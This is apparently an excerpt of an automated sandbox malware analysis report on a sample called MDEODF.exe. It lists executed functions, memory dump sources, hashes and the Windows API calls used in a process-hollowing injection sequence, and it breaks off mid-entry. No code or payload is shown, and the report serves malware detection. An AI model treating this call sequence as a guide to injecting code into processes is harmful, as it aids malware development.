Function 0030C328 Relevance: 1.6, APIs: 1, Instructions: 106
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0030C3DA

Memory Dump Source

Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: 3fc3c7fc1393db1655979af044fbe6e6fef05ebf0b3c4a72fbb03470bd03bc93
Instruction ID: 23474d06bb743cebc10bf6e6959f5a1f0e8c018f7b2f00af75efa3357c1b8103
Opcode Fuzzy Hash: 3fc3c7fc1393db1655979af044fbe6e6fef05ebf0b3c4a72fbb03470bd03bc93
Instruction Fuzzy Hash: 2441BCB9D002589FCF10CFAAD884AEEFBB1BF49310F10A42AE814B7250C734A945CF64

Function 0030C7C8 Relevance: 1.6, APIs: 1, Instructions: 98
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetContextThread.NTDLL(?,?), ref: 0030C87F

Memory Dump Source

Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: dda48ceeaa6c58c3efb317f82795b11c0303d743b396310133bca0c562a3f5d5
Instruction ID: 9630fdc08a0750e91c7fd11bf05eadb3b28dbfb95a671ff7a56d8082eed704a4
Opcode Fuzzy Hash: dda48ceeaa6c58c3efb317f82795b11c0303d743b396310133bca0c562a3f5d5
Instruction Fuzzy Hash: 5341CBB5D012589FCB10CFAAD884AEEFBF1BF49314F24902AE415B7250C778A949CF64

Function 0030C7D0 Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON

Download Yara Rule

APIs

NtSetContextThread.NTDLL(?,?), ref: 0030C87F

Memory Dump Source

Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 725ff61bc5154420fe0e4ef1aeb65d3ab66a83b62cbdb1c3cc324dfa4bd0c7b6
Instruction ID: 1e1e3c32383bdb2c662a98d12d7c73447f66e0c69fcefb802b3338950863cef4
Opcode Fuzzy Hash: 725ff61bc5154420fe0e4ef1aeb65d3ab66a83b62cbdb1c3cc324dfa4bd0c7b6
Instruction Fuzzy Hash: C731BBB5D012589FCB10CFAAD884AEEFBF1BF49314F24902AE414B7240C778A949CF64

Function 0030C451 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 0030C4E1

Memory Dump Source

Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ba1fe3aa70bf359c8633f12a1e59d319b051a38a828ed099681eb54d3213730d
Instruction ID: ce274fd4cf826330f576d823270beea333726f18c2fdab37dbfe9e99e3dec734
Opcode Fuzzy Hash: ba1fe3aa70bf359c8633f12a1e59d319b051a38a828ed099681eb54d3213730d
Instruction Fuzzy Hash: AD31B9B8D012089FCB10CFA9E994AEEFBF1BB49310F20952AE805B7350C774A945CF64

Function 0030C458 Relevance: 1.6, APIs: 1, Instructions: 80nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 0030C4E1

Memory Dump Source

Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 04443359629c3b20fa7c8e83339c53cdef3daf2377fd926557bbfedfa041937c
Instruction ID: fda82db515cb17608592e782983d42b92905bff75878abe85933e73c38acf238
Opcode Fuzzy Hash: 04443359629c3b20fa7c8e83339c53cdef3daf2377fd926557bbfedfa041937c
Instruction Fuzzy Hash: E031AAB5D012189FCB10CFA9D984AAEFBF5BB49310F20942AE805B7240C774A945CFA4

Function 0030C550 Relevance: 1.6, APIs: 1, Instructions: 104
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0030C602

Memory Dump Source

Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 93130d42083030871b643dc759f1ca1d15932e6f59a809fdbc1db6f54559cf9a
Instruction ID: ad050ca8a96a686d95555c138a2864fad237387d88bcb3a482025cbecf6eb2c0
Opcode Fuzzy Hash: 93130d42083030871b643dc759f1ca1d15932e6f59a809fdbc1db6f54559cf9a
Instruction Fuzzy Hash: 8031A8B9D002489FCF10CFA9D994AEEFBB1BB49310F24A42AE815B7350C735A945CF65

Function 0030C558 Relevance: 1.6, APIs: 1, Instructions: 101
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0030C602

Memory Dump Source

Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ced17c63cbd0318115a7cb441ff6f13b5b3d737114a315ef61b732cfb5bcd072
Instruction ID: 03b2c8dfd843845a7d73b405eedbdb3cd082e5a502b31e4e14d862c7e87d4f31
Opcode Fuzzy Hash: ced17c63cbd0318115a7cb441ff6f13b5b3d737114a315ef61b732cfb5bcd072
Instruction Fuzzy Hash: A131A8B9D002489FCF10CFA9D984AEEFBB5BB49310F24A42AE814B7310D735A945CF64

Analysis Process: MDEODF.exePID: 3948, Parent PID: 3884COMMON

Executed Functions

Function 00300B60 Relevance: 5.8, Strings: 4, Instructions: 765COMMON

Download Yara Rule

Strings

dp, xrefs: 00300E64
@T', xrefs: 003013E0
@T', xrefs: 00301489
(e', xrefs: 00301359

Memory Dump Source

Source File: 00000009.00000002.375934302.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID: (e'$@T'$@T'$dp
API String ID: 0-2762516323
Opcode ID: 2e5517f764fadafbda18ccaa8e2ac00a33eabc138be2ad458c466cd433b9de1e
Instruction ID: 58fe2b132d69f07050bbc3317dd84dbd646dfed627fa610114bd1b77b6f88075
Opcode Fuzzy Hash: 2e5517f764fadafbda18ccaa8e2ac00a33eabc138be2ad458c466cd433b9de1e
Instruction Fuzzy Hash: 1A82B074901229CFCB25DFA8D894BDDB7B5BF49300F1086AAD409AB365DB30AE85CF54

Function 00300A49 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

pR', xrefs: 00300A81

Memory Dump Source

Source File: 00000009.00000002.375934302.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID: pR'
API String ID: 0-2251766783
Opcode ID: a8739c88c5180c35cccbab137d59b62f43b4ef39143b90969e6177924bdc5e4d
Instruction ID: c3e7b03bd226cf389ad84a701f87cd90f43735a7d72a176c099030f0fae1b9ff
Opcode Fuzzy Hash: a8739c88c5180c35cccbab137d59b62f43b4ef39143b90969e6177924bdc5e4d
Instruction Fuzzy Hash: 0F214C70E0125A9FCF05DBA8D450ADDBFB1AF49300F4582A6D464BB262D770A94ACF50

Function 00300848 Relevance: 1.3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

Strings

dP', xrefs: 003008B8

Memory Dump Source

Source File: 00000009.00000002.375934302.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID: dP'
API String ID: 0-2939048657
Opcode ID: 4025d41ae3cf11e70a247cb6e1152fba3415d3505a71e7657c5fc4fac8b303be
Instruction ID: 559d554071bd760c47ee3584435233e1fb42aac9106bffbfe41f929a3c126180
Opcode Fuzzy Hash: 4025d41ae3cf11e70a247cb6e1152fba3415d3505a71e7657c5fc4fac8b303be
Instruction Fuzzy Hash: 4B110D70912309EFCB02FF68E449B4DBBF1EB44304F4089A5D4489B26DDB789A598F95

Function 00301870 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.375934302.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 058efe3ca9f205a527844b3423a80b7c378e97c56be92d8b5201d4d0b2b68274
Instruction ID: 70e95abdd4873c01ecdf8cf59795445233fbc25bccb8f5b65186d99faa7419bd
Opcode Fuzzy Hash: 058efe3ca9f205a527844b3423a80b7c378e97c56be92d8b5201d4d0b2b68274
Instruction Fuzzy Hash: 17F03C74D09249CADF01DFA6D4647EEBBF4AB49300F14916AD454B7281D7784649CF50

Function 003009F0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.375934302.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 558a7374cca65b9d0201f68035db721f2e1805220c0d1a567c5d7e8ddeff3b2e
Instruction ID: d7b8f3f186b72af82ca63a2087c9035fb07f0f267b578637867ec91f748125c8
Opcode Fuzzy Hash: 558a7374cca65b9d0201f68035db721f2e1805220c0d1a567c5d7e8ddeff3b2e
Instruction Fuzzy Hash: CCF0B274D0020DDFCB45EFA8E9556AEBBB4FB45300F1046AAC419A7290EB709A84CB80

Analysis Process: MDEODF.exePID: 3964, Parent PID: 3884COMMON

Executed Functions

Function 001C0B60 Relevance: 2.0, Strings: 1, Instructions: 765COMMON

Download Yara Rule

Strings

dp, xrefs: 001C0E64

Memory Dump Source

Source File: 0000000B.00000002.376711678.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID: dp
API String ID: 0-2261812057
Opcode ID: a495e3e15df0f1aca2c7d9d0e30b5c16aff7f007349ad5d9da29c2f7542addbf
Instruction ID: f19d0ff10751de61fb1c8ac3082051fe7f1bd443d77817d480f77d4563c2fc29
Opcode Fuzzy Hash: a495e3e15df0f1aca2c7d9d0e30b5c16aff7f007349ad5d9da29c2f7542addbf
Instruction Fuzzy Hash: 80829074900229CFCB25DFA8D894BDDBBB5BF49304F1085AAD409AB365D770AE85CF50

Function 001C05E7 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.376711678.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d291cee3f438889b8d1a9a877dfa8bd3df6165453d4600842547d80eac7dee2
Instruction ID: 34b4775a4ebd80c6522aa641bf6860f6e56740f78409e14b9a7a55cce5ab2cdb
Opcode Fuzzy Hash: 1d291cee3f438889b8d1a9a877dfa8bd3df6165453d4600842547d80eac7dee2
Instruction Fuzzy Hash: 3D3184719093899FC703EBB4E8A8A8D7FB1EB46304F0445EBC0449B167E7748A49CB91

Function 001C0630 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.376711678.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a713b7c3ecabe5808141c87d6e102ff7bede7a1d22655d96a7f59e1ee4cec1d6
Instruction ID: 86e107318a05e74c594ef5ce561c584863ad1cefb80be996d75e3a43b16baae3
Opcode Fuzzy Hash: a713b7c3ecabe5808141c87d6e102ff7bede7a1d22655d96a7f59e1ee4cec1d6
Instruction Fuzzy Hash: A8218371904349DFC703EFB8E8A578D7FB1EF45308F4089AAD0449B66AE7749989CB81

Function 001C0A49 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.376711678.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb27ef99912939ebcd84ec372c8012f1c20af8c89cedb91b682be58300f579c8
Instruction ID: 7959d25e02c2b8dc6f685cd6953f5ea11bc014bc0031872b38a6b44ec11d833c
Opcode Fuzzy Hash: bb27ef99912939ebcd84ec372c8012f1c20af8c89cedb91b682be58300f579c8
Instruction Fuzzy Hash: AF215E71D002499FCF05DBA8D450ADDBFB1EF49310F4582A6D454BB262D770AA4ACF50

Function 001C0848 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.376711678.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 180d3d4655a50af5a3f7cdccd072a69aaa2caddb931f3999b05006f56e2dd2e3
Instruction ID: 8aced8faaef9ee8645e92f5be27b3bcb1cac9093b91f767ed568b8a3aa651918
Opcode Fuzzy Hash: 180d3d4655a50af5a3f7cdccd072a69aaa2caddb931f3999b05006f56e2dd2e3
Instruction Fuzzy Hash: FD112770D00309DFC702EFA8E99574D7BB5FB44308F508966D0449B669DB749A89CF81

Function 001C1870 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.376711678.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dea0ff62c1b3862ea275659641b5d22698e9f7a2a0d6f5102e2a15088b4744aa
Instruction ID: de055e2e7bbb4d51983f7228c62fbc4e94b041bea3374feacfbe1dc7ec1c720f
Opcode Fuzzy Hash: dea0ff62c1b3862ea275659641b5d22698e9f7a2a0d6f5102e2a15088b4744aa
Instruction Fuzzy Hash: 2BF0AFB5C48289DBCF11DFA5E8147EEBBF0AB5A300F145069C015B7242D7784A45CF61

Function 001C09DF Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.376711678.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a078cdbf6f333a4a62ff7f62daf17899f65f2fc9e07c52628469c749deee0574
Instruction ID: 600d81742f4e6b7a3958b4fc25062223c3eddf70163431f7fa94f44781c3fdfe
Opcode Fuzzy Hash: a078cdbf6f333a4a62ff7f62daf17899f65f2fc9e07c52628469c749deee0574
Instruction Fuzzy Hash: 8001E470C09249DFCB12DFB8D894ADDBFB0AF06200F1446EEC445A72A2EB318A94CB41

Function 001C09F0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.376711678.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af0a75c188988b8935d5b61ff69e9796036712b468b15873ef9cff3f5baefaf8
Instruction ID: 2a6b3a6ca18baabea358fd8632a1a93df948af0f4b1f39e3b28271318d4e0ea1
Opcode Fuzzy Hash: af0a75c188988b8935d5b61ff69e9796036712b468b15873ef9cff3f5baefaf8
Instruction Fuzzy Hash: 99F0B274C0020DDFCB45EFA8D945AAEBBB4FB45300F1046AAC419A7250EB709A84CB80

Analysis Process: MDEODF.exePID: 3996, Parent PID: 3884COMMON

Executed Functions

Function 00360B60 Relevance: 7.0, Strings: 5, Instructions: 765COMMON

Download Yara Rule

Strings

(e), xrefs: 00361359
dp, xrefs: 00360E64
#q^, xrefs: 00361383, 00361388
@T), xrefs: 003613E0
@T), xrefs: 00361489

Memory Dump Source

Source File: 0000000C.00000002.376998229.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_360000_MDEODF.jbxd

Similarity

API ID:
String ID: (e)$@T)$@T)$dp$#q^
API String ID: 0-1851065574
Opcode ID: 24c2812e357b9a7b282ce2987ecd1d45d2287b0834e9ef3034c259862bba8116
Instruction ID: 57cfcbcc8e9fe7fd43c6976074e959c4b3bfb885a3ff65a2977239c36627ba39
Opcode Fuzzy Hash: 24c2812e357b9a7b282ce2987ecd1d45d2287b0834e9ef3034c259862bba8116
Instruction Fuzzy Hash: C9829074A00229CFCB25DFA8D884BDDB7B5BF49304F1485AAD409AB265DB70AE85CF50

Function 003605ED Relevance: 1.6, Strings: 1, Instructions: 315COMMON

Download Yara Rule

Strings

dP), xrefs: 003608B8

Memory Dump Source

Source File: 0000000C.00000002.376998229.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_360000_MDEODF.jbxd

Similarity

API ID:
String ID: dP)
API String ID: 0-1217822678
Opcode ID: e9ffe9d23f9b23c0d5339d6d5d3f8cf0ce7e4595e833670526adc475b3fd24cf
Instruction ID: 90003c344277bc77f646ec5ae40a75442990f9d0ad4be59e8c32784bee21748d
Opcode Fuzzy Hash: e9ffe9d23f9b23c0d5339d6d5d3f8cf0ce7e4595e833670526adc475b3fd24cf
Instruction Fuzzy Hash: 213194709193859FC707EB78E4587893FB0AF47305B4548E6C080CF16BD6384989CBA2

Function 00360A49 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

pR), xrefs: 00360A81

Memory Dump Source

Source File: 0000000C.00000002.376998229.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_360000_MDEODF.jbxd

Similarity

API ID:
String ID: pR)
API String ID: 0-1636767480
Opcode ID: 81080da939719ca5efb2907a9f3f328ef229c999a7bc095aa4d93ba32ce8d8c2
Instruction ID: 1820a2285b41978f8f447a616033534ae286e636b36064ce4ff3f88938635c9c
Opcode Fuzzy Hash: 81080da939719ca5efb2907a9f3f328ef229c999a7bc095aa4d93ba32ce8d8c2
Instruction Fuzzy Hash: 2B212A71E002499FCF05DFB9D454ADDBBB1EF49310F8581A6D864BB261D730A94ACF50

Function 00360848 Relevance: 1.3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

Strings

dP), xrefs: 003608B8

Memory Dump Source

Source File: 0000000C.00000002.376998229.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_360000_MDEODF.jbxd

Similarity

API ID:
String ID: dP)
API String ID: 0-1217822678
Opcode ID: 9d6415ac4dfa9777f50a5d9aaf5d38574a0d66cb2336ac7e28dbdd924295a8a3
Instruction ID: 3b6b6dcca4be3b1d91744a88025ce591cc2c88964cb8b5011f32e9beab599a4a
Opcode Fuzzy Hash: 9d6415ac4dfa9777f50a5d9aaf5d38574a0d66cb2336ac7e28dbdd924295a8a3
Instruction Fuzzy Hash: DC114F74910709EFCB06FFA8E449B4D7BB1FF49305F408D65D0149B269DB749A8A8F90

Function 00361870 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.376998229.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_360000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac70a06baab4f654046fafd9fd5b9db789b49d95868e49a0b57988923b3cc73f
Instruction ID: 79f7ad21a0fb5ba38ef7e98836afa7693cb4fcf58f843c25b84593319b72e2a0
Opcode Fuzzy Hash: ac70a06baab4f654046fafd9fd5b9db789b49d95868e49a0b57988923b3cc73f
Instruction Fuzzy Hash: BDF08C70C043498ADF02CFA6D4143EEBBF4EB8A310F1490AAD454B7205D7784949CFA0

Function 003609F0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.376998229.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_360000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2e5aa01c5979673d940fdb2d82bcb3bb2b078051ea9c8fd5506dda03113c6e4
Instruction ID: cae98f6db49b2f7cf473e911b6889bb8edee566dce618dd3f934dc25935c4728
Opcode Fuzzy Hash: c2e5aa01c5979673d940fdb2d82bcb3bb2b078051ea9c8fd5506dda03113c6e4
Instruction Fuzzy Hash: F4F0B274C0020EDFCB45EFA8E945AAEBBB4FB45304F1046AAC415A7254EB709A44CB80

Analysis Process: MDEODF.exePID: 3168, Parent PID: 3084COMMON

Execution Graph

Execution Coverage:	33.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	307
Total number of Limit Nodes:	0

Executed Functions

Function 001DB870 Relevance: 1.9, APIs: 1, Instructions: 397
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 001DBCBF

Memory Dump Source

Source File: 00000011.00000002.393541227.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_MDEODF.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 41e93d0219011b80b6c74ba536b34dfd7825db7ed4f0e24d93e8f3bdce2cabcb
Instruction ID: ee113d7ea1842b493b48225bb207a187e82794c086833917436512780e0cb1f0
Opcode Fuzzy Hash: 41e93d0219011b80b6c74ba536b34dfd7825db7ed4f0e24d93e8f3bdce2cabcb
Instruction Fuzzy Hash: 1E02D074E04229CFDB24CFA9C880B9DBBF2BF49304F1181AAE419A7351DB349A85CF55

Function 001DC670 Relevance: 1.6, APIs: 1, Instructions: 120
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 001DC748

Memory Dump Source

Source File: 00000011.00000002.393541227.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_MDEODF.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 60bf3f52a32f92542157c5de298e497f983e640582e3015a8a3acfa7d3755f33
Instruction ID: 30eb0a845db94223873189ddb9c6b1cc4a800e91ec4c97fe6ae9ae5a0fb2fc89
Opcode Fuzzy Hash: 60bf3f52a32f92542157c5de298e497f983e640582e3015a8a3acfa7d3755f33
Instruction Fuzzy Hash: 1C41B9B5D002599FCF00CFA9D984AEEFBF1AB49314F24942AE814B7250D378AA45CF64

Function 001DC678 Relevance: 1.6, APIs: 1, Instructions: 115
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 001DC748

Memory Dump Source

Source File: 00000011.00000002.393541227.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_MDEODF.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 5a9d50e741487051df36a0dc5311371e221d4d61ea0dbfb76bfa98236acac77c
Instruction ID: 568e0c049c6507e5347ec49759738b978457456e5ae63fdaac45e76a0d1fe95f
Opcode Fuzzy Hash: 5a9d50e741487051df36a0dc5311371e221d4d61ea0dbfb76bfa98236acac77c
Instruction Fuzzy Hash: 2B41A8B5D012599FCF00CFA9D984AEEFBF1AB49314F24942AE814B7250D338AA45CF64

Function 001DC320 Relevance: 1.6, APIs: 1, Instructions: 109
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 001DC3DA

Memory Dump Source

Source File: 00000011.00000002.393541227.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_MDEODF.jbxd

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: 0e09f698b6ed11a7b6d3d9e36fc084a39ae92b704d63c1a642e13c5dea830c78
Instruction ID: c3fc9ba500cfb6af42c1365426989352282644c9c4f24217e7d3ec288329906f
Opcode Fuzzy Hash: 0e09f698b6ed11a7b6d3d9e36fc084a39ae92b704d63c1a642e13c5dea830c78
Instruction Fuzzy Hash: 2341A8B9D002599FCF10CFAAD984AEEFBB1BB49310F10942AE814B7250D735A945CF68

Function 001DC328 Relevance: 1.6, APIs: 1, Instructions: 106
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 001DC3DA

Memory Dump Source

Source File: 00000011.00000002.393541227.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_MDEODF.jbxd

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: 123cb2f1c16339cbc873813af1bd1869d03f6f5dd49115860194aa76838cbd85
Instruction ID: 595ff9c8bdaeb8db5d3e7bcc3bddb53d3377de0feea45edc87df8d4558db6d61
Opcode Fuzzy Hash: 123cb2f1c16339cbc873813af1bd1869d03f6f5dd49115860194aa76838cbd85
Instruction Fuzzy Hash: 3F4197B9D002599FCF10CFAAD984AEEFBB1BB49310F14942AE814B7210D775A945CF68

Function 001DC7C8 Relevance: 1.6, APIs: 1, Instructions: 96nativethreadCOMMON

Download Yara Rule

APIs

NtSetContextThread.NTDLL(?,?), ref: 001DC87F

Memory Dump Source

Source File: 00000011.00000002.393541227.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_MDEODF.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 994d981c1ee0d076fd0cb8de86361c4dfb38ab9a620d9fc06fb4ea9abc59e5eb
Instruction ID: d442734a97ef16a5c512bcb8b45e5ef6458d0ec4485a4b471a61cbb767bbdb7b
Opcode Fuzzy Hash: 994d981c1ee0d076fd0cb8de86361c4dfb38ab9a620d9fc06fb4ea9abc59e5eb
Instruction Fuzzy Hash: 774199B5D002599FCB14CFA9D984AEEFBF1AB49314F24842AE414B7244C778A949CF94

Function 001DC7D0 Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON

Download Yara Rule

APIs

NtSetContextThread.NTDLL(?,?), ref: 001DC87F

Memory Dump Source

Source File: 00000011.00000002.393541227.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_MDEODF.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 4c0fbc0ae8794f377880f819eac391998ee97f7bdfdde187e55c3e576ecf1c66
Instruction ID: 2edf8a8986fcc3d8637ce88ab1227134076fd5c02e8207876d2b2010bfd5d9cf
Opcode Fuzzy Hash: 4c0fbc0ae8794f377880f819eac391998ee97f7bdfdde187e55c3e576ecf1c66
